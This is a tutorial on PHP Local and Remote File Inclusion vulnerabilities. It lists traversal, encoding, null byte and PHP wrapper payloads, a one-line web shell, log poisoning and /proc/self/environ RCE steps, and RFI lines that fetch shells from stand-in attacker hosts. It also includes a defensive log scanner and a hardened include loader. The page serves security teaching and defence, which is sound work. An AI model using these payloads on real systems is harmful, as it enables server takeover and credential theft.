LFI & RFI

Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities occur when a web application includes files based on user-controlled input. When inclusion parameters are not validated, sanitized, or restricted, attackers can read arbitrary files, execute code, or even load remote malicious scripts. LFI and RFI are among the most critical file-based vulnerabilities because they interact directly with the server’s filesystem and interpreter.

How File Inclusion Works

Many applications use dynamic file loading:

include($_GET['page']);

If the user controls the page parameter, they may load:

  • internal system files

  • application source code

  • sensitive configuration files

  • remote malicious scripts (RFI)

  • uploaded files (leading to RCE)

Bad design enables attackers to break out of intended directories.

Local File Inclusion (LFI)

LFI allows attackers to load files from the server’s filesystem.

Example vulnerable URL parameter:

page=home.php

Backend:

include("pages/" . $_GET['page']);

Attacker supplies:

page=../../../../etc/passwd

Server loads:

/etc/passwd

This exposes system-level data.

Common LFI Payloads

Basic Traversal Payloads

../
../../
../../../etc/passwd

Encoded Traversal

..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd

Null Byte Injection (older PHP versions)

../../../../etc/passwd%00

The null byte terminates the path string, so any extension the application appends after the user input is dropped.

Wrappers (PHP-specific)

php://filter – view PHP source code

php://filter/convert.base64-encode/resource=index.php

Decoding reveals full source code.

php://input – execute raw POST body

page=php://input

POST payload:

<?php system($_GET['cmd']); ?>

data:// RCE payload

data://text/plain,<?php system($_GET['cmd']); ?>

Practical LFI Testing Workflow

Step 1: Identify inclusion parameters

Look for:

page=
file=
template=
view=
action=
module=
dir=

Test with traversal sequences:

?page=../../../../etc/passwd

If readable output appears → LFI.

Step 2: Test for extension bypasses

If the application appends .php to the parameter:

?page=../../../../etc/passwd%00
?page=../../../../etc/passwd/.
?page=php://filter/convert.base64-encode/resource=config

Step 3: Extract sensitive system files

Linux

/etc/passwd
/etc/shadow
/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log

Windows

C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts

Application files:

wp-config.php
config.php
.env
settings.py

These contain database passwords, API keys, and secrets.

Step 4: Use LFI to Achieve RCE

LFI becomes deadly when combined with:

1. File Upload

  1. Upload shell.php into /uploads/.

  2. Include it via LFI:

?page=../../uploads/shell.php

This executes the shell → RCE.

2. Log Poisoning (Apache/Nginx)

Inject PHP code into logs:

Send request:

User-Agent: <?php system($_GET['cmd']); ?>

Include log file:

?page=/var/log/apache2/access.log

Now execute:

?page=/var/log/apache2/access.log&cmd=id

3. /proc/self/environ RCE

Inject malicious User-Agent header:

User-Agent: <?php system($_GET['cmd']); ?>

Then include:

page=/proc/self/environ

If PHP execution occurs → RCE.

Remote File Inclusion (RFI)

RFI occurs when the application includes external URLs.

Example vulnerable code:

include($_GET['page']);

Attacker provides:

?page=http://attacker.com/shell.txt

If allow_url_include is enabled, PHP fetches and executes the remote file.

Remote file content:

<?php system($_GET['cmd']); ?>

Visiting:

?page=http://attacker.com/shell.txt&cmd=id

executes commands on the server.

When RFI Works

RFI only works if:

  • allow_url_fopen = On

  • allow_url_include = On

  • No validation on page parameter

Older PHP systems commonly had these enabled.

Common RFI Payloads

Direct Remote Shell

?page=http://evil.com/php.txt

Remote Code Hosting From GitHub Raw

?page=https://raw.githubusercontent.com/user/shell.php

HTTP + Base64 Execution

?page=http://attacker.com/shell.txt?cmd=whoami

Using DNS Redirect Tricks

?page=http://attacker.dns/evil

If DNS is compromised → RFI becomes possible.
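The payload shapes listed under Common LFI Payloads and Common RFI Payloads can be recognised in web-server logs. The scanner below is an added example, not code from the original page: it unwraps single and double URL encoding, then flags traversal, null bytes, PHP wrappers, remote URLs and well-known sensitive paths in the inclusion parameters named earlier. The log lines and the attacker.example host are constructed for the example.

```php
<?php
// Added example (not from the original page): flag the LFI/RFI payload shapes
// listed above in access-log lines. Log lines and the attacker.example host are
// constructed for this example; the parameter names are the page's own list.
declare(strict_types=1);
const INCLUSION_PARAMS = ['page', 'file', 'template', 'view', 'action', 'module', 'dir'];
// Indicator name => pattern applied to the fully decoded parameter value.
const CHECKS = [
    'traversal'      => '#\.\.(/|\\\\)#',
    'null-byte'      => '#\x00#',
    'php-wrapper'    => '#^(php|data|expect|phar)://#i',
    'remote-url'     => '#^(https?|ftp)://#i',
    'sensitive-path' => '#/etc/(passwd|shadow)|/proc/self/environ|/var/log/#i',
];
// Decode repeatedly so double encoding (%252f -> %2f -> /) is unwrapped.
function fully_decode(string $v): string
{
    while (($d = rawurldecode($v)) !== $v) { $v = $d; }
    return $v;
}
// Return indicators found in one request target ("indicator:param"), [] if none.
function classify_request(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query)) return [];
    $hits = [];
    foreach (explode('&', $query) as $pair) {
        [$k, $v] = array_pad(explode('=', $pair, 2), 2, '');
        if (!in_array(strtolower($k), INCLUSION_PARAMS, true)) continue;
        $val = fully_decode($v);
        foreach (CHECKS as $name => $re) {
            if (preg_match($re, $val)) $hits[] = "$name:$k";
        }
    }
    return $hits;
}
// Constructed combined-format log lines; the request target is the quoted part.
$log = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1833',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 4100',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?page=http://attacker.example/shell.txt&cmd=id HTTP/1.1" 200 77',
];
foreach ($log as $line) {
    if (preg_match('#"(?:GET|POST) (\S+) HTTP/#', $line, $m)) {
        $hits = classify_request($m[1]);
        echo ($hits ? 'ALERT ' . implode(',', $hits) : 'ok') . '  ' . $m[1] . "\n";
    }
}
```

The first line reports ok; the others report traversal plus sensitive-path, php-wrapper, and remote-url respectively.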

Practical RFI Testing Workflow

Step 1: Check Response to Remote URLs

?page=http://example.com/

If output appears → potential RFI.

Step 2: Host a Malicious File

Create shell.txt:

<?php echo shell_exec($_GET['cmd']); ?>

Serve it:

python3 -m http.server 80

Inject:

?page=http://YOUR-IP/shell.txt

Step 3: Execute Commands

?page=http://YOUR-IP/shell.txt&cmd=id

If command output loads → RFI achieved.

Chaining LFI and RFI With Other Attacks

  • LFI + File Upload → RCE

  • LFI + Log Poisoning → RCE

  • LFI + Session File Poisoning → RCE

  • RFI + Remote Shell → RCE

  • LFI + SSRF → reading internal services

File inclusion vulnerabilities almost always escalate into code execution.

Why LFI/RFI Happens

Root causes include:

  • concatenating user input into file paths

  • trusting URLs as file sources

  • missing directory whitelists

  • no canonical path validation

  • lack of extension enforcement

  • relying on blacklists

  • insecure default PHP configuration

Developers underestimate how easily attackers manipulate file paths.
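The vulnerable include from the LFI section beside a hardened loader that addresses the root causes listed above (allow-list instead of blacklist, application-controlled extension, canonical path containment). This is an added example, not code from the original page; the pages/ directory, the page names and the function names are assumptions.

```php
<?php
// Added example (not from the original page): the LFI section's
// include("pages/" . $_GET['page']) beside a hardened loader that addresses
// the root causes listed above. The pages/ directory, the page names and the
// function names are assumptions made for this example.
declare(strict_types=1);

const PAGES_DIR = __DIR__ . '/pages';

// Vulnerable: user input is concatenated straight into the include path, so
// ../../../../etc/passwd, php://filter/... and (with allow_url_include=On)
// http://... all reach include() unchanged.
function vulnerable_include(string $page): void
{
    include("pages/" . $page);
}

// Hardened: map a user-supplied page name to a file under PAGES_DIR, or null.
function resolve_page(string $page, array $allowed): ?string
{
    // 1. An allow-list of page names replaces any blacklist of "../", "%2f"
    //    or "php://"; anything not on the list is rejected outright.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 2. The application appends the extension; the user never supplies it,
    //    so %00 and "/." truncation tricks have nothing to cut off.
    $candidate = PAGES_DIR . '/' . $page . '.php';
    // 3. Canonicalise and check containment as a second layer. realpath()
    //    returns false for missing files, remote URLs and PHP wrappers.
    $base = realpath(PAGES_DIR);
    $real = realpath($candidate);
    if ($base === false || $real === false) {
        return null;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$allowed = ['home', 'about', 'contact'];
$page = $_GET['page'] ?? 'home';
$path = is_string($page) ? resolve_page($page, $allowed) : null;
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Pair this with allow_url_include=Off and an open_basedir restriction in php.ini so that a future code path that skips resolve_page still cannot reach remote URLs or files outside the application directory.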

Impact of LFI and RFI

These vulnerabilities enable:

  • reading sensitive files

  • leaking credentials

  • executing arbitrary code

  • uploading shells

  • escalating privileges

  • stealing sessions

  • harvesting internal application logic

  • complete server compromise

LFI + minimal additional flaws often results in full remote code execution. RFI alone can instantly grant full control.

Intel Dump

  • LFI loads local files through user-controlled path parameters.

  • RFI loads remote code when URL-based inclusion is allowed.

  • Attack methods include traversal, encoding, wrappers, and null-byte injection.

  • Sensitive files such as config files, logs, and credentials are easily extracted.

  • LFI can be escalated to RCE via file upload, log poisoning, and /proc exploitation.

  • RFI directly executes remote attacker-controlled scripts when PHP allows URL includes.

  • Both vulnerabilities lead to high-severity outcomes, including full system compromise.
